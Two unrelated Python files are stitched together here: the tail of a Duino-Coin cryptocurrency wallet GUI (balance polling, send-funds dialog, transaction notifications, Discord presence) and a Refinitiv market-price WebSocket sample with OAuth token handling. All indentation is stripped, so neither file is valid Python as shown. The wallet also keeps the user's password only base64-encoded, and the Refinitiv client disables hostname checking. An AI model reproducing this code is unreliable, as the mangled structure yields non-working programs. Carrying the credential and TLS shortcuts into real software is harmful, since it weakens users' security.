original = Image.open(resources + "discord.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
discord = ImageTk.PhotoImage(resized)
discord.image = discord
discordLabel = Label(
settingsWindow,
image=discord,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
discordLabel.grid(
row=11,
column=3,
sticky=N + S + E + W,
padx=(0, 5),
pady=(0, 5))
discordLabel.bind("<Button-1>", openDiscord)
def get_balance():
global oldbalance
global balance
global unpaid_balance
global global_balance
global gtxl
try:
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv().decode()
soc.send(bytes(
"BALA",
encoding="utf8"))
oldbalance = balance
balance = float(soc.recv().decode().rstrip("\n"))
global_balance = round(float(balance), 8)
try:
gtxl = {}
soc.send(bytes(
"GTXL," + str(username) + ",7",
encoding="utf8"))
gtxl = str(soc.recv().decode().rstrip(
"\n").replace("\'", "\""))
gtxl = jsonloads(gtxl)
except Exception as e:
print("Error getting transaction list: " + str(e))
if oldbalance != balance:
difference = float(balance) - float(oldbalance)
dif_with_unpaid = (
float(balance) - float(oldbalance)) + unpaid_balance
if float(balance) != float(difference):
if (dif_with_unpaid >= MIN_TRANSACTION_VALUE
or dif_with_unpaid < 0
):
now = datetime.now()
difference = round(dif_with_unpaid, 8)
if ((
difference >= MIN_TRANSACTION_VALUE_NOTIFY
or difference < 0)
and notificationsEnabled
): # notify only when the notification system is available
notification = Notify()
notification.title = get_string("duino_coin_wallet")
notification.message = (
get_string("notification_new_transaction")
+ "\n"
+ now.strftime("%d.%m.%Y %H:%M:%S\n")
+ str(round(difference, 6))
+ " DUCO")
notification.icon = resources + "duco_color.png"
notification.send(block=False)
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO Transactions(Date, amount)
VALUES(?, ?)""", (
now.strftime("%d.%m.%Y %H:%M:%S"),
round(difference, 8)))
con.commit()
unpaid_balance = 0
else:
unpaid_balance += float(balance) - float(oldbalance)
except Exception as e:
print("Retrying in 3s. (" + str(e) + ")")
Timer(3, get_balance).start()
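# Shape assumed for the GTXL reply parsed into gtxl above (inferred from how
# transactions_window() reads it; the actual server payload may differ):
#   {"0": {"Sender": "...", "Recipient": "...", "Amount": 1.23, "Hash": "..."},
#    "1": {...}, ...}
# Only the Sender, Recipient, Amount and Hash fields are used by this wallet.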
def get_wbalance():
if TRONPY_ENABLED:
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
wBalance = float(wduco.functions.balanceOf(pub_key)) / (10 ** 6)
return wBalance
except Exception:
return 0.0
else:
return 0.0
def update_balance_labels():
global profit_array, profitCheck
try:
balancetext.set(str(round(global_balance, 7)) + " ᕲ")
wbalancetext.set(str(get_wbalance()) + " wᕲ")
balanceusdtext.set(
"$" + str(round(global_balance * duco_fiat_value, 4)))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT rowid,* FROM Transactions ORDER BY rowid DESC")
Transactions = cur.fetchall()
transactionstext_format = ""
for i, row in enumerate(Transactions, start=1):
transactionstext_format += str(row[1]) + \
" " + str(row[2]) + " DUCO\n"
if i == 6:
transactionstext_format = transactionstext_format.rstrip("\n")
break
transactionstext.set(transactionstext_format)
if profit_array[2] != 0:
sessionprofittext.set(
get_string("session") + ": "
+ str(profit_array[0]) + " ᕲ")
minuteprofittext.set(
"≈" + str(profit_array[1]) + " ᕲ/"
+ get_string("minute"))
hourlyprofittext.set(
"≈" + str(profit_array[2]) + " ᕲ/"
+ get_string("hour"))
dailyprofittext.set(
"≈"
+ str(profit_array[3])
+ " ᕲ/"
+ get_string("day")
+ " ($"
+ str(round(profit_array[3] * duco_fiat_value, 4))
+ ")")
else:
if profitCheck > 10:
sessionprofittext.set(get_string("sessionprofit_unavailable1"))
minuteprofittext.set(get_string("sessionprofit_unavailable2"))
hourlyprofittext.set("")
dailyprofittext.set("")
profitCheck += 1
except Exception:
_exit(0)
Timer(1, update_balance_labels).start()
def profit_calculator(start_bal):
try: # Thanks Bilaboz for the code!
global curr_bal, profit_array
prev_bal = curr_bal
curr_bal = global_balance
session = curr_bal - start_bal
tensec = curr_bal - prev_bal
minute = tensec * 6
hourly = minute * 60
daily = hourly * 24
if tensec >= 0:
profit_array = [
round(session, 8),
round(minute, 6),
round(hourly, 4),
round(daily, 2)]
except Exception:
_exit(0)
Timer(10, profit_calculator, [start_bal]).start()
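# Worked example of the extrapolation above (illustrative numbers): if the
# balance grows by 0.05 DUCO between two 10-second samples, then
#   minute = 0.05 * 6  = 0.3 DUCO/min
#   hourly = 0.3 * 60  = 18.0 DUCO/h
#   daily  = 18.0 * 24 = 432.0 DUCO/day
# and profit_array becomes [<session total>, 0.3, 18.0, 432.0] after rounding.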
def send_funds_protocol(handler):
recipientStr = recipient.get()
amountStr = amount.get()
MsgBox = messagebox.askquestion(
get_string("warning"),
get_string("send_funds_warning")
+ " "
+ str(amountStr)
+ " DUCO "
+ get_string("send_funds_to")
+ " "
+ str(recipientStr)
+ "?",
icon="warning",)
if MsgBox == "yes":
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv().decode()
soc.send(
bytes(
"SEND,"
+ "-"
+ ","
+ str(recipientStr)
+ ","
+ str(amountStr),
encoding="utf8"))
response = soc.recv().decode().rstrip("\n").split(",")
soc.close()
if "OK" in str(response[0]):
MsgBox = messagebox.showinfo(response[0],
response[1]
+ "\nTXID:"
+ response[2])
else:
MsgBox = messagebox.showwarning(response[0], response[1])
root.update()
def init_rich_presence():
global RPC
try:
RPC = Presence(806985845320056884)
RPC.connect()
except Exception: # Discord not launched
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
balance = round(global_balance, 4)
RPC.update(
details=str(balance)
+ " ᕲ ($"
+ str(round(duco_fiat_value * balance, 2))
+ ")",
start=startTime,
large_image="duco",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
except Exception: # Discord not launched
pass
sleep(15)
class Wallet:
def __init__(self, master):
global recipient
global amount
global balancetext
global wbalancetext
global sessionprofittext
global minuteprofittext
global hourlyprofittext
global dailyprofittext
global balanceusdtext
global transactionstext
global curr_bal
global profit_array
try:
loading.destroy()
except Exception:
pass
textFont4 = Font(
size=14,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
size=12,
weight="bold")
TEXT_FONT_BOLD = Font(
size=18,
weight="bold")
TEXT_FONT = Font(
size=12,
weight="normal")
self.master = master
master.resizable(False, False)
master.configure(background=BACKGROUND_COLOR)
master.title(get_string("duino_coin_wallet"))
Label(
master,
text=get_string("uppercase_duino_coin_wallet")
+ ": "
+ str(username),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
balancetext = StringVar()
wbalancetext = StringVar()
balancetext.set(get_string("please_wait"))
if TRONPY_ENABLED:
wbalancetext.set(get_string("please_wait"))
else:
wbalancetext.set("0.00")
balanceLabel = Label(
master,
textvariable=balancetext,
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
balanceLabel.grid(row=1,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
wbalanceLabel = Label(
master,
textvariable=wbalancetext,
font=textFont4,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
wbalanceLabel.grid(row=2,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
balanceusdtext = StringVar()
balanceusdtext.set(get_string("please_wait"))
Label(
master,
textvariable=balanceusdtext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=3,
sticky=S + E,
pady=(0, 1.5),
padx=(0, 5))
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=4,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5),
pady=(0, 5))
def clear_recipient_placeholder(self):
recipient.delete("0", "100")
def clear_amount_placeholder(self):
amount.delete("0", "100")
Label(
master,
text=get_string("recipient"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=0,
sticky=W + S,
padx=(5, 0))
recipient = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
recipient.grid(row=5,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
recipient.insert("0", "revox")
recipient.bind("<FocusIn>", clear_recipient_placeholder)
Label(
master,
text=get_string("amount"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=0,
sticky=W + S,
padx=(5, 0))
amount = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
amount.grid(row=6,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
amount.insert("0", str(VERSION))
amount.bind("<FocusIn>", clear_amount_placeholder)
sendLabel = Button(
master,
text=get_string("send_funds"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
sendLabel.grid(
row=8,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5),
pady=(1, 2))
sendLabel.bind("<Button-1>", send_funds_protocol)
wrapLabel = Button(
master,
text=get_string("wrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=0,
sticky=N + S + E + W,
columnspan=2,
padx=(5, 1),
pady=(1, 5))
wrapLabel.bind("<Button-1>", wrapper_window)
wrapLabel = Button(
master,
text=get_string("unwrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=2,
sticky=N + S + E + W,
columnspan=2,
padx=(1, 5),
pady=(1, 5))
wrapLabel.bind("<Button-1>", unwrapper_window)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=10,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5))
Label(
master,
text=get_string("estimated_profit"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=11,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
sessionprofittext = StringVar()
sessionprofittext.set(get_string("please_wait_calculating"))
sessionProfitLabel = Label(
master,
textvariable=sessionprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
sessionProfitLabel.grid(
row=12,
column=0,
sticky=W,
columnspan=4,
padx=5)
minuteprofittext = StringVar()
minuteProfitLabel = Label(
master,
textvariable=minuteprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
minuteProfitLabel.grid(
row=13,
column=0,
sticky=W,
columnspan=4,
padx=5)
hourlyprofittext = StringVar()
hourlyProfitLabel = Label(
master,
textvariable=hourlyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
hourlyProfitLabel.grid(
row=14,
column=0,
sticky=W,
columnspan=4,
padx=5)
dailyprofittext = StringVar()
dailyprofittext.set("")
dailyProfitLabel = Label(
master,
textvariable=dailyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
dailyProfitLabel.grid(
row=15,
column=0,
sticky=W,
columnspan=4,
padx=5)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=16,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5)
Label(
master,
text=get_string("local_transactions"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=17,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
transactionstext = StringVar()
transactionstext.set("")
transactionstextLabel = Label(
master,
textvariable=transactionstext,
font=TEXT_FONT,
justify=LEFT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionstextLabel.grid(
row=18,
column=0,
sticky=W,
columnspan=4,
padx=5,
pady=(0, 5))
separator = ttk.Separator(master,
orient="horizontal")
separator.grid(
row=19,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5,
pady=(0, 10))
original = Image.open(resources + "transactions.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
transactions = ImageTk.PhotoImage(resized)
transactions.image = transactions
transactionsLabel = Label(
master,
image=transactions,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionsLabel.grid(
row=20,
column=0,
sticky=N + S + W + E,
pady=(0, 5))
transactionsLabel.bind("<Button>", transactions_window)
original = Image.open(resources + "calculator.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
calculator = ImageTk.PhotoImage(resized)
calculator.image = calculator
calculatorLabel = Label(
master,
image=calculator,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
calculatorLabel.grid(
row=20,
column=1,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
calculatorLabel.bind("<Button>", currency_converter_window)
original = Image.open(resources + "stats.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
stats = ImageTk.PhotoImage(resized)
stats.image = stats
statsLabel = Label(
master,
image=stats,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
statsLabel.grid(
row=20,
column=2,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
statsLabel.bind("<Button>", statistics_window)
original = Image.open(resources + "settings.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
settings = ImageTk.PhotoImage(resized)
settings.image = settings
settingsLabel = Label(
master,
image=settings,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
settingsLabel.grid(
row=20,
column=3,
sticky=N + S + W + E,
padx=(0, 10),
pady=(0, 5))
settingsLabel.bind("<Button>", settings_window)
root.iconphoto(True, PhotoImage(file=resources + "duco_color.png"))
start_balance = global_balance
curr_bal = start_balance
profit_calculator(start_balance)
update_balance_labels()
root.mainloop()
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed."
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"pypresence\".")
install("pypresence")
try:
from PIL import Image, ImageTk
except ModuleNotFoundError:
print("Pillow is not installed. "
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"Pillow\".")
install("Pillow")
try:
from notifypy import Notify
except ModuleNotFoundError:
print("Notify-py is not installed. "
+ "Continuing without notification system.")
notificationsEnabled = False
else:
notificationsEnabled = True
try:
from cryptography.fernet import Fernet, InvalidToken
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
backend = default_backend()
except ModuleNotFoundError:
print("Cryptography is not installed. "
+ "Please manually install \"cryptography\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import secrets
except ModuleNotFoundError:
print("Secrets is not installed. "
+ "Please manually install \"secrets\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
from base64 import urlsafe_b64decode as b64d
from base64 import urlsafe_b64encode as b64e
except ModuleNotFoundError:
print("Base64 is not installed. "
+ "Please manually install \"base64\""
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import websocket
except ModuleNotFoundError:
print("websocket-client is not installed. "
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"websocket-client\".")
install("websocket-client")
try:
import tronpy
from tronpy.keys import PrivateKey
TRONPY_ENABLED = True
except ModuleNotFoundError:
TRONPY_ENABLED = False
print("Tronpy is not installed. "
+ "Please manually install \"tronpy\" "
+ "if you intend on using wDUCO wrapper.")
else:
try:
tron = tronpy.Tron()
wduco = tron.get_contract("TWYaXdxA12JywrUdou3PFD1fvx2PWjqK9U")
except Exception:
TRONPY_ENABLED = False
print("Tron-side error, disabling wrapper for this session")
if not path.exists(resources):
mkdir(resources)
with sqlconn(resources + "/wallet.db") as con:
cur = con.cursor()
cur.execute(
"""CREATE TABLE IF NOT EXISTS
Transactions(Date TEXT, amount REAL)""")
cur.execute(
"""CREATE TABLE IF NOT EXISTS
UserData(username TEXT, password TEXT, useWrapper TEXT)""")
con.commit()
if not Path(resources + "duco.png").is_file():
urlretrieve("https://i.imgur.com/9JzxR0B.png", resources + "duco.png")
if not Path(resources + "duco_color.png").is_file():
urlretrieve(
"https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/master/"
+ "Resources/duco.png?raw=true",
resources + "duco_color.png")
if not Path(resources + "calculator.png").is_file():
urlretrieve("https://i.imgur.com/iqE28Ej.png",
resources + "calculator.png")
if not Path(resources + "exchange.png").is_file():
urlretrieve("https://i.imgur.com/0qMtoZ7.png",
resources + "exchange.png")
if not Path(resources + "discord.png").is_file():
urlretrieve("https://i.imgur.com/LoctALa.png",
resources + "discord.png")
if not Path(resources + "github.png").is_file():
urlretrieve("https://i.imgur.com/PHEfWbl.png",
resources + "github.png")
if not Path(resources + "settings.png").is_file():
urlretrieve("https://i.imgur.com/NNEI4WL.png",
resources + "settings.png")
if not Path(resources + "transactions.png").is_file():
urlretrieve("https://i.imgur.com/nbVPlKk.png",
resources + "transactions.png")
if not Path(resources + "stats.png").is_file():
urlretrieve("https://i.imgur.com/KRfHZUM.png",
resources + "stats.png")
if not Path(resources + "langs.json").is_file():
urlretrieve(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "Wallet_langs.json",
resources + "langs.json")
# Load language strings depending on system locale
with open(resources + "langs.json", "r", encoding="utf-8") as lang_file:
lang_file = jsonloads(lang_file.read())
try:
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("bg"):
lang = "bulgarian"
elif locale.startswith("nl"):
lang = "dutch"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("uk"):
lang = "ukrainian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("sk"):
lang = "slovak"
elif locale.startswith("th"):
lang = "thai"
elif locale.startswith("ko"):
lang = "korean"
else:
lang = "english"
except IndexError:
lang = "english"
if __name__ == "__main__":
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count < 1:
root = Tk()
lf = LoginFrame(root)
root.mainloop()
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count >= 1:
loading_window()
cur = con.cursor()
cur.execute("SELECT * FROM UserData")
userdata_query = cur.fetchone()
username = userdata_query[0]
passwordEnc = (userdata_query[1]).decode("utf-8")
password = b64decode(passwordEnc).decode("utf8")
status.config(text=get_string("preparing_wallet_window"))
loading.update()
try:
# Start duco price updater
get_duco_price()
get_balance()
init_rich_presence()
Thread(target=update_rich_presence).start()
try:
# Destroy loading dialog and start the main wallet window
loading.destroy()
except Exception:
pass
root = Tk()
my_gui = Wallet(root)
except Exception as e:
print(e)
_exit(0)
|
market_price_rdpgw_service_discovery.py
|
#!/usr/bin/env python
# |-----------------------------------------------------------------------------
# | This source code is provided under the Apache 2.0 license --
# | and is provided AS IS with no warranty or guarantee of fit for purpose. --
# | See the project's LICENSE.md for details. --
# | Copyright (C) 2018-2021 Refinitiv. All rights reserved. --
# |-----------------------------------------------------------------------------
"""
This example demonstrates authenticating via Refinitiv Data Platform, using an
authentication token to discover Refinitiv Real-Time service endpoint, and
using the endpoint and authentitcation to retrieve market content. Specifically,
for oAuthPasswordGrant authentication, this application uses password grant type
or refresh_token grant token in auth request to RDP (auth/oauth2/v1/token) using
Refintiv provided credentials: username (typically machine ID) and password. A
client id is generated by customers using the app-generator tool.
This example maintains a session by proactively renewing the authentication
token before expiration.
This example can run with optional hotstandby support. Without this support, the application
will use a load-balanced interface with two hosts behind the load balancer. With hot standly
support, the application will access two hosts and display the data (should be identical) from
each of the hosts.
It performs the following steps:
- Authenticating via HTTP Post request to Refinitiv Data Platform
- Retrieving service endpoints from Service Discovery via HTTP Get request,
using the token retrieved from Refinitiv Data Platform
- Opening a WebSocket (or two, if the --hotstandby option is specified) to
a Refinitiv Real-Time Service endpoint, as retrieved from Service Discovery
- Sending Login into the Real-Time Service using the token retrieved
from Refinitiv Data Platform.
- Requesting market-price content.
- Printing the response content.
- Periodically proactively re-authenticating to Refinitiv Data Platform, and
providing the updated token to the Real-Time endpoint before token expiration.
"""
import sys
import time
import getopt
import requests
import socket
import json
import websocket
import threading
# Global Default Variables
app_id = '256'
auth_url = 'https://api.refinitiv.com:443/auth/oauth2/v1/token'
discovery_url = 'https://api.refinitiv.com/streaming/pricing/v1/'
password = ''
newPassword = ''
position = ''
sts_token = ''
refresh_token = ''
user = ''
clientid = ''
client_secret = ''
scope = 'trapi.streaming.pricing.read'
region = 'us-east-1'
ric = '/TRI.N'
service = 'ELEKTRON_DD'
hostList = []
hotstandby = False
# Global Variables
session2 = None
original_expire_time = '0'
# Global Variables for Password Policy Description
PASSWORD_LENGTH_MASK = 0x1
PASSWORD_UPPERCASE_LETTER_MASK = 0x2
PASSWORD_LOWERCASE_LETTER_MASK = 0x4
PASSWORD_DIGIT_MASK = 0x8
PASSWORD_SPECIAL_CHARACTER_MASK = 0x10
PASSWORD_INVALID_CHARACTER_MASK = 0x20
PASSWORD_LENGTH_MIN = 30
PASSWORD_UPPERCASE_LETTER_MIN = 1
PASSWORD_LOWERCASE_LETTER_MIN = 1
PASSWORD_DIGIT_MIN = 1
PASSWORD_SPECIAL_CHARACTER_MIN = 1
PASSWORD_SPECIAL_CHARACTER_SET = "~!@#$%^&*()-_=+[]{}|;:,.<>/?"
PASSWORD_MIN_NUMBER_OF_CATEGORIES = 3
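# Note on the masks above (an assumption about check_new_password() further
# below, not a documented contract): each violated policy rule is expected to
# set its bit in the returned result, so a password that is both too short and
# missing a digit would yield PASSWORD_LENGTH_MASK | PASSWORD_DIGIT_MASK (0x9).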
class WebSocketSession:
logged_in = False
session_name = ''
web_socket_app = None
web_socket_open = False
host = ''
disconnected_by_user = False
def __init__(self, name, host):
self.session_name = name
self.host = host
def _send_market_price_request(self, ric_name):
""" Create and send simple Market Price request """
mp_req_json = {
'ID': 2,
'Key': {
'Name': ric_name,
'Service': service
},
}
self.web_socket_app.send(json.dumps(mp_req_json))
print("SENT on " + self.session_name + ":")
print(json.dumps(mp_req_json, sort_keys=True, indent=2, separators=(',', ':')))
def _send_login_request(self, auth_token, is_refresh_token):
"""
Send login request with authentication token.
Used both for the initial login and subsequent reissues to update the authentication token
"""
login_json = {
'ID': 1,
'Domain': 'Login',
'Key': {
'NameType': 'AuthnToken',
'Elements': {
'ApplicationId': '',
'Position': '',
'AuthenticationToken': ''
}
}
}
login_json['Key']['Elements']['ApplicationId'] = app_id
login_json['Key']['Elements']['Position'] = position
login_json['Key']['Elements']['AuthenticationToken'] = auth_token
# If the token is a refresh token, this is not our first login attempt; set no_refresh flag
if is_refresh_token:
login_json['Refresh'] = False
self.web_socket_app.send(json.dumps(login_json))
print("SENT on " + self.session_name + ":")
print(json.dumps(login_json, sort_keys=True, indent=2, separators=(',', ':')))
def _process_login_response(self, message_json):
""" Send item request """
if message_json['State']['Stream'] != "Open" or message_json['State']['Data'] != "Ok":
print("Login failed.")
sys.exit(1)
self.logged_in = True
self._send_market_price_request(ric)
def _process_message(self, message_json):
""" Parse at high level and output JSON of message """
message_type = message_json['Type']
if message_type == "Refresh":
if 'Domain' in message_json:
message_domain = message_json['Domain']
if message_domain == "Login":
self._process_login_response(message_json)
elif message_type == "Ping":
pong_json = {'Type': 'Pong'}
self.web_socket_app.send(json.dumps(pong_json))
print("SENT on " + self.session_name + ":")
print(json.dumps(pong_json, sort_keys=True, indent=2, separators=(',', ':')))
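# Keepalive note: the server periodically sends {"Type": "Ping"} messages; the
# branch above answers each one with {"Type": "Pong"} so the session stays open.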
# Callback events from WebSocketApp
def _on_message(self, ws, message):
""" Called when message received, parse message into JSON for processing """
print("RECEIVED on " + self.session_name + ":")
message_json = json.loads(message)
print(json.dumps(message_json, sort_keys=True, indent=2, separators=(',', ':')))
for singleMsg in message_json:
self._process_message(singleMsg)
def _on_error(self, ws, error):
""" Called when websocket error has occurred """
print("Session: " + str(self.session_name) + "; Error: "+ str(error))
def _on_close(self, ws, close_status_code, close_msg):
""" Called when websocket is closed """
self.web_socket_open = False
self.logged_in = False
print("WebSocket Closed for " + self.session_name)
if not self.disconnected_by_user:
print("Reconnect to the endpoint for " + self.session_name + " after 3 seconds... ")
time.sleep(3)
self.connect()
def _on_open(self, ws):
""" Called when handshake is complete and websocket is open, send login """
print("WebSocket successfully connected for " + self.session_name + "!")
self.web_socket_open = True
self._send_login_request(sts_token, False)
# Operations
def connect(self):
# Start websocket handshake
ws_address = "wss://{}/WebSocket".format(self.host)
print("Connecting to WebSocket " + ws_address + " for " + self.session_name + "...")
self.web_socket_app = websocket.WebSocketApp(ws_address,
on_message=self._on_message,
on_error=self._on_error,
on_close=self._on_close,
on_open=self._on_open,
subprotocols=['tr_json2'])
# Event loop
wst = threading.Thread(target=self.web_socket_app.run_forever, kwargs={'sslopt': {'check_hostname': False}})
wst.start()
def disconnect(self):
print("Closing the WebSocket connection for " + self.session_name)
self.disconnected_by_user = True
if self.web_socket_open:
self.web_socket_app.close()
def refresh_token(self):
if self.logged_in:
print("Refreshing the access token for " + self.session_name)
self._send_login_request(sts_token, True)
def query_service_discovery(url=None):
if url is None:
url = discovery_url
print("Sending Refinitiv Data Platform service discovery request to " + url)
try:
r = requests.get(url, headers={"Authorization": "Bearer " + sts_token}, params={"transport": "websocket"}, allow_redirects=False)
except requests.exceptions.RequestException as e:
print('Refinitiv Data Platform service discovery exception failure:', e)
return False
if r.status_code == 200:
# Service discovery request was successful. Deserialize the response.
response_json = r.json()
print("Refinitiv Data Platform Service discovery succeeded. RECEIVED:")
print(json.dumps(response_json, sort_keys=True, indent=2, separators=(',', ':')))
for index in range(len(response_json['services'])):
if not response_json['services'][index]['location'][0].startswith(region):
continue
if not hotstandby:
if len(response_json['services'][index]['location']) == 2:
hostList.append(response_json['services'][index]['endpoint'] + ":" +
str(response_json['services'][index]['port']))
break
else:
if len(response_json['services'][index]['location']) == 1:
hostList.append(response_json['services'][index]['endpoint'] + ":" +
str(response_json['services'][index]['port']))
if hotstandby:
if len(hostList) < 2:
print("Expected 2 hosts but received:", len(hostList), "or the region:", region, "is not present in list of endpoints")
sys.exit(1)
else:
if len(hostList) == 0:
print("The region:", region, "is not present in list of endpoints")
sys.exit(1)
return True
elif r.status_code in [ 301, 302, 307, 308 ]:
# Perform URL redirect
print('Refinitiv Data Platform service discovery HTTP code:', r.status_code, r.reason)
new_host = r.headers['Location']
if new_host is not None:
print('Perform URL redirect to ', new_host)
return query_service_discovery(new_host)
return False
elif r.status_code in [ 403, 404, 410, 451 ]:
# Stop trying with the request
print('Refinitiv Data Platform service discovery HTTP code:', r.status_code, r.reason)
print('Stop trying with the request')
return False
else:
# Retry the service discovery request
print('Refinitiv Data Platform service discovery HTTP code:', r.status_code, r.reason)
time.sleep(5)
# CAUTION: This is sample code with infinite retries.
print('Retry the service discovery request')
return query_service_discovery()
def get_sts_token(current_refresh_token, url=None):
"""
Retrieves an authentication token.
:param current_refresh_token: Refresh token retrieved from a previous authentication, used to retrieve a
subsequent access token. If not provided (i.e. on the initial authentication), the password is used.
"""
if url is None:
url = auth_url
if not current_refresh_token: # First time through, send password
data = {'username': user, 'password': password, 'client_id': clientid, 'grant_type': 'password', 'takeExclusiveSignOnControl': True,
'scope': scope}
print("Sending authentication request with password to", url, "...")
else: # Use the given refresh token
data = {'username': user, 'client_id': clientid, 'refresh_token': current_refresh_token, 'grant_type': 'refresh_token'}
print("Sending authentication request with refresh token to", url, "...")
if client_secret != '':
data['client_secret'] = client_secret;
try:
# Request with auth for https protocol
r = requests.post(url,
headers={'Accept': 'application/json'},
data=data,
auth=(clientid, client_secret),
verify=True,
allow_redirects=False)
except requests.exceptions.RequestException as e:
print('Refinitiv Data Platform authentication exception failure:', e)
return None, None, None
if r.status_code == 200:
auth_json = r.json()
print("Refinitiv Data Platform Authentication succeeded. RECEIVED:")
print(json.dumps(auth_json, sort_keys=True, indent=2, separators=(',', ':')))
return auth_json['access_token'], auth_json['refresh_token'], auth_json['expires_in']
elif r.status_code in [ 301, 302, 307, 308 ]:
# Perform URL redirect
print('Refinitiv Data Platform authentication HTTP code:', r.status_code, r.reason)
new_host = r.headers['Location']
if new_host is not None:
print('Perform URL redirect to ', new_host)
return get_sts_token(current_refresh_token, new_host)
return None, None, None
elif r.status_code in [ 400, 401 ]:
# Retry with username and password
print('Refinitiv Data Platform authentication HTTP code:', r.status_code, r.reason)
if current_refresh_token:
# Refresh token may have expired. Try using our password.
print('Retry with username and password')
return get_sts_token(None)
return None, None, None
